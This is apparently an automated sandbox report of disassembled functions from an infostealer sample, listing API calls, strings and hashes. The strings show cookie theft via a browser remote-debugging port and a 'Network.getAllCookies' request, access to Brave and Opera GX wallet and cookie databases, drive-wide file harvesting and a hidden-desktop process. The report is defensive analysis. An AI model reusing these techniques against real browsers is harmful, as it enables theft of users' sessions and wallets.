Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: File$lstrcat$lstrcpy$Copy$CloseDeleteFind_memset$CreateHandleProcesslstrlen$AllocFirstLocalNextObjectOpenReadSingleSizeSystemTerminateThreadTimeWait
String ID: --remote-debugging-port=9223 --profile-directory="$ --remote-debugging-port=9223 --profile-directory="$Brave$Opera GX$Preferences$\BraveWallet\Preferences$_cookies.db$_cookies.db$_webdata.db
API String ID: 1219303437-2271920603
Opcode ID: 5538056b166afdf4d784903559b47b74cde5197dedc463c33988530d21d3dbbd
Instruction ID: b30069787ea0e3deca025c2749171b13fbf7bda517345bb8ff3cba34c8001d51
Opcode Fuzzy Hash: 5538056b166afdf4d784903559b47b74cde5197dedc463c33988530d21d3dbbd
Instruction Fuzzy Hash: 78723A3190062AABCFA1EB65ED56ACD777ABF04301F4504A8BA08B7111DB316FD9CF85

Function 00617FAB Relevance: 60.2, APIs: 28, Strings: 6, Instructions: 715
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00620532: std::_Xinvalid_argument.LIBCPMT ref: 0062054B

Part of subcall function 0062045E: _memmove.LIBCMT ref: 00620478

Part of subcall function 006202CD: memchr.MSVCRT ref: 00620336

WSAStartup.WS2_32(00000202,?), ref: 00618241

Part of subcall function 00620532: _memmove.LIBCMT ref: 0062059D

socket.WS2_32(00000002,00000001,00000006), ref: 0061825D
WSACleanup.WS2_32 ref: 0061826E
getaddrinfo.WS2_32(?,00000000,?,?), ref: 006182CD
closesocket.WS2_32(?), ref: 006182DD
WSACleanup.WS2_32 ref: 006182E3

Strings

Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 00618435
:, xrefs: 0061816B
Sec-WebSocket-Version: 13, xrefs: 0061847A
{"id":1,"method":"Network.getAllCookies"}, xrefs: 0061859F
HTTP/1.1Host: , xrefs: 006183AB
ws://, xrefs: 00618055

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Cleanup_memmove$StartupXinvalid_argumentclosesocketgetaddrinfomemchrsocketstd::_
String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Network.getAllCookies"}
API String ID: 2519114892-1552268179
Opcode ID: 94bbed5a229a2c1c1f68d3f1e7f06beb5073825843a4160dd509d05d50f202bf
Instruction ID: 6afe2f39cf6bf5053f217f656ec565d5a42a08da7085ae02a840422359f029b4
Opcode Fuzzy Hash: 94bbed5a229a2c1c1f68d3f1e7f06beb5073825843a4160dd509d05d50f202bf
Instruction Fuzzy Hash: 7F628D35D002B89EEF209B24DC85AD9BBB6AF05310F1441EAE289A7592CBB05FC5CF51

Function 00626A05 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00626A59
FindFirstFileA.KERNEL32(?,?), ref: 00626A70
_memset.LIBCMT ref: 00626A8C
_memset.LIBCMT ref: 00626A9D
StrCmpCA.SHLWAPI(?,00647A38), ref: 00626ABE
StrCmpCA.SHLWAPI(?,00647A3C), ref: 00626AD8
wsprintfA.USER32 ref: 00626AFF
StrCmpCA.SHLWAPI(?,0064766E), ref: 00626B13
wsprintfA.USER32 ref: 00626B3C
wsprintfA.USER32 ref: 00626B53

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

_memset.LIBCMT ref: 00626B65
lstrcatA.KERNEL32(?,?), ref: 00626B7A
strtok_s.MSVCRT ref: 00626BBF
_memset.LIBCMT ref: 00626BD1
lstrcatA.KERNEL32(?,?), ref: 00626BE6
strtok_s.MSVCRT ref: 00626BFF
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00626C14
DeleteFileA.KERNEL32(?,00647A68,0064766F), ref: 00626CCD
CopyFileA.KERNEL32(?,?,00000001), ref: 00626CDD

Part of subcall function 00623DFD: CreateFileA.KERNEL32(lb,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00626CE9,?), ref: 00623E18

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00626CF3
DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00626CFE
strtok_s.MSVCRT ref: 00626D24
FindNextFileA.KERNELBASE(?,?), ref: 00626E42
FindClose.KERNEL32(?), ref: 00626E62

Strings

%s\*.*, xrefs: 00626A4D
%s\%s, xrefs: 00626AF9
%s\%s\%s, xrefs: 00626B36
%s\%s, xrefs: 00626B4D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 956187361-332874205
Opcode ID: 993101db12f6779566f8b5d8d890705ec63b8413bb2f863449832074402156fc
Instruction ID: 304f1ec3ceae1e456b328e750e0ca4508b8f87e64c12d1bf33e31d2c2cbdf715
Opcode Fuzzy Hash: 993101db12f6779566f8b5d8d890705ec63b8413bb2f863449832074402156fc
Instruction Fuzzy Hash: 26C13D72E0062AABCF21AF64EC459EE777EBF04301F0504A5FA09A3151DB359F958F54

Function 00627D20 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00627D67
FindFirstFileA.KERNEL32(?,?), ref: 00627D7E
StrCmpCA.SHLWAPI(?,00647AF4), ref: 00627D9F
StrCmpCA.SHLWAPI(?,00647AF8), ref: 00627DB9
wsprintfA.USER32 ref: 00627DE0
StrCmpCA.SHLWAPI(?,006476B6), ref: 00627DF4
wsprintfA.USER32 ref: 00627E11
wsprintfA.USER32 ref: 00627E28
PathMatchSpecA.SHLWAPI(?,?), ref: 00627E3E
lstrcatA.KERNEL32(?), ref: 00627E74
lstrcatA.KERNEL32(?,00647B10), ref: 00627E86
lstrcatA.KERNEL32(?,?), ref: 00627E99
lstrcatA.KERNEL32(?,00647B14), ref: 00627EAB
lstrcatA.KERNEL32(?,?), ref: 00627EBF
CopyFileA.KERNEL32(?,?,00000001), ref: 00627F78
DeleteFileA.KERNEL32(?), ref: 00627FEC
FindNextFileA.KERNEL32(?,?), ref: 0062804E
FindClose.KERNEL32(?), ref: 00628062

Strings

%s\%s, xrefs: 00627E22
%s\*, xrefs: 00627D5B
%s\%s, xrefs: 00627DDA

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 2178766154-445461498
Opcode ID: 0a628e0dbbb4c9768c29d2b6247d91c5eb324b67027ac9a02052d7eae86c9050
Instruction ID: 48bc72e877da80ed29e5f10626f9af138d859d73093058945ee97609d70f298c
Opcode Fuzzy Hash: 0a628e0dbbb4c9768c29d2b6247d91c5eb324b67027ac9a02052d7eae86c9050
Instruction Fuzzy Hash: 58812771D0062D9BCF60EB64DC45ACE77BABF04301F0485E5E688A3151DF35AB998F94

Function 00618DEA Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 149stringsleepprocessCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00618E2B
wsprintfA.USER32 ref: 00618E44
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00618E5D
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00618E79
_memset.LIBCMT ref: 00618E99
lstrcatA.KERNEL32(00000000,?), ref: 00618EAE
lstrcatA.KERNEL32(00000000,?), ref: 00618EC1
lstrcatA.KERNEL32(00000000,0064821C), ref: 00618ED3
_memset.LIBCMT ref: 00618EE2
lstrcpyA.KERNEL32(?,00000000), ref: 00618F13
_memset.LIBCMT ref: 00618F30
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00618F8B
Sleep.KERNEL32(00001388), ref: 00618F9A
CloseDesktop.USER32(?), ref: 00618FCF

Strings

OCALAPPDATA, xrefs: 00618EFA
D, xrefs: 00618F5A
ChromeBuildTools, xrefs: 00618E33

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: _memset$Desktoplstrcat$Create$CloseOpenProcessSleeplstrcpywsprintf
String ID: ChromeBuildTools$D$OCALAPPDATA
API String ID: 3792893142-3777181503
Opcode ID: d959273c8309de74b7ab8273490b423855e335f51493d5a106834a5f8b89a166
Instruction ID: 1f85d056dc87974fec8466f84cc82f6cf9e4cc5bfad93bb7145edf38be612198
Opcode Fuzzy Hash: d959273c8309de74b7ab8273490b423855e335f51493d5a106834a5f8b89a166
Instruction Fuzzy Hash: 80511DB190022CAFDB61EF64DC86EDE7BBDBB09314F4004A5B609E7151DA749B848FA4

Function 0061688F Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A10
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A16
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A1C
Part of subcall function 006149DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00614A2E
Part of subcall function 006149DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00614A36

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 006168F1
StrCmpCA.SHLWAPI(?), ref: 0061690B
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0061693A
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00616979
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 006169A9
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006169B4
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 006169D8
InternetReadFile.WININET(?,?,000007CF,?), ref: 00616A6C
InternetCloseHandle.WININET(?), ref: 00616A7C
InternetCloseHandle.WININET(?), ref: 00616A88
InternetCloseHandle.WININET(?), ref: 00616A94

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Strings

ERROR, xrefs: 006169E2
GET, xrefs: 0061696E
ERROR, xrefs: 00616AD7

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 3863758870-2509457195
Opcode ID: 530252eb4cff4a3e4af5bc0b1ccf20455f17c424a562fd08cde4f4b811171f4c
Instruction ID: fc29704c7ac8d8fd016605a83a032e0a613f090ad93a830cbbb0e302268eb666
Opcode Fuzzy Hash: 530252eb4cff4a3e4af5bc0b1ccf20455f17c424a562fd08cde4f4b811171f4c
Instruction Fuzzy Hash: F6517D7290026AAFDF609B64DC85EEEB7B9FB04344F0481A6F648B6160DF315EC59F90

Function 00611D70 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

FindFirstFileA.KERNEL32(?,?,0064BBCC,0064BBD0,00647AC2,00647ABF,0062953D,?,00000000), ref: 00611F94
StrCmpCA.SHLWAPI(?,0064BBD4), ref: 00611FC7
StrCmpCA.SHLWAPI(?,0064BBD8), ref: 00611FE1
FindFirstFileA.KERNEL32(?,?,0064BBDC,0064BBE0,?,0064BBE4,00647AC3), ref: 006120CD
CopyFileA.KERNEL32(?,?,00000001), ref: 006122B3

Part of subcall function 00623A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00623A59

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

DeleteFileA.KERNEL32(?), ref: 00612326
FindNextFileA.KERNEL32(?,?), ref: 00612392
FindClose.KERNEL32(?), ref: 006123A6
CopyFileA.KERNEL32(?,?,00000001), ref: 006125CC

Part of subcall function 00619148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0061F752,?,?,?), ref: 00619163
Part of subcall function 00619148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0061F752,?,?,?), ref: 0061917A
Part of subcall function 00619148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0061F752,?,?,?), ref: 00619191
Part of subcall function 00619148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0061F752,?,?,?), ref: 006191A8
Part of subcall function 00619148: CloseHandle.KERNEL32(?,?,?,?,?,0061F752,?,?,?), ref: 006191D0

DeleteFileA.KERNEL32(?), ref: 0061263F

Part of subcall function 00628BE6: Sleep.KERNEL32(000003E8,?,?), ref: 00628C4D

FindNextFileA.KERNEL32(?,?), ref: 006126B6
FindClose.KERNEL32(?), ref: 006126CA

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 00628BE6: CreateThread.KERNEL32(00000000,00000000,00628B15,?,00000000,00000000), ref: 00628C85
Part of subcall function 00628BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00628C8D

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006239EE: GetFileAttributesA.KERNEL32(?,?,?,0061EA72,?,?,?), ref: 006239F5

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

Strings

\*.*, xrefs: 00611E8E

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1475085387-1173974218
Opcode ID: 87932183363c26a3ae3f7834d52757cc9a89789c7512c9f050705eb3d98d0f3e
Instruction ID: 133ac6b4718c2bb939bd087ed5e4eef1a5e09c00dbedfea94c217f26cd68f69f
Opcode Fuzzy Hash: 87932183363c26a3ae3f7834d52757cc9a89789c7512c9f050705eb3d98d0f3e
Instruction Fuzzy Hash: 3332EA31A0153A9BCBA0FB25ED56ACD737AAF04310F4505E9BA4877162CB316FD58F88

Function 00628D90 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?,?,?,?), ref: 00628DB4
wsprintfA.USER32 ref: 00628DD5
FindFirstFileA.KERNEL32(?,?), ref: 00628DEC
_mbscmp.MSVCRT ref: 00628E13
_mbscmp.MSVCRT ref: 00628E2B
_splitpath.MSVCRT ref: 00628E66
_ismbcupper.MSVCRT ref: 00628EB3
wsprintfA.USER32 ref: 00628EE1
SHFileOperationA.SHELL32(?), ref: 00628F56
FindNextFileA.KERNELBASE(?,?), ref: 00628F69
FindClose.KERNEL32(?), ref: 00628F7D

Strings

%s\*, xrefs: 00628DCF
%s\%s, xrefs: 00628EDB

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: FileFind$_mbscmpwsprintf$CloseFirstFolderNextOperationPath_ismbcupper_splitpath
String ID: %s\%s$%s\*
API String ID: 102359269-2848263008
Opcode ID: 912b3322e7a252207e88ae9378b15433c50832ae40aa522af2cda6516aefc97b
Instruction ID: aa4d125730fc69b4c5e0c3eeb3cb86784191de292e6d7351341d9785d33ed1bd
Opcode Fuzzy Hash: 912b3322e7a252207e88ae9378b15433c50832ae40aa522af2cda6516aefc97b
Instruction Fuzzy Hash: 3651C47190062C9FDB11DB68EC88AEB7BBEAB09341F1449F5E549E3150EA709F888F50

Function 00626E7F Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 144stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00626EFF
_memset.LIBCMT ref: 00626F22
GetDriveTypeA.KERNEL32(?), ref: 00626F2B
lstrcpyA.KERNEL32(?,?), ref: 00626F4B
lstrcpyA.KERNEL32(?,?), ref: 00626F65

Part of subcall function 00626A05: wsprintfA.USER32 ref: 00626A59
Part of subcall function 00626A05: FindFirstFileA.KERNEL32(?,?), ref: 00626A70
Part of subcall function 00626A05: _memset.LIBCMT ref: 00626A8C
Part of subcall function 00626A05: _memset.LIBCMT ref: 00626A9D
Part of subcall function 00626A05: StrCmpCA.SHLWAPI(?,00647A38), ref: 00626ABE
Part of subcall function 00626A05: StrCmpCA.SHLWAPI(?,00647A3C), ref: 00626AD8
Part of subcall function 00626A05: wsprintfA.USER32 ref: 00626AFF
Part of subcall function 00626A05: StrCmpCA.SHLWAPI(?,0064766E), ref: 00626B13
Part of subcall function 00626A05: wsprintfA.USER32 ref: 00626B3C
Part of subcall function 00626A05: _memset.LIBCMT ref: 00626B65
Part of subcall function 00626A05: lstrcatA.KERNEL32(?,?), ref: 00626B7A

lstrcpyA.KERNEL32(?,00000000), ref: 00626F85
lstrlenA.KERNEL32(?), ref: 00626FFF

Strings

%DRIVE_FIXED%, xrefs: 00626F6B
*%DRIVE_FIXED%*, xrefs: 00626E9B
%DRIVE_REMOVABLE%, xrefs: 00626F51
qb, xrefs: 00626E92
*%DRIVE_REMOVABLE%*, xrefs: 00626ECC
qb, xrefs: 0062709B

Memory Dump Source

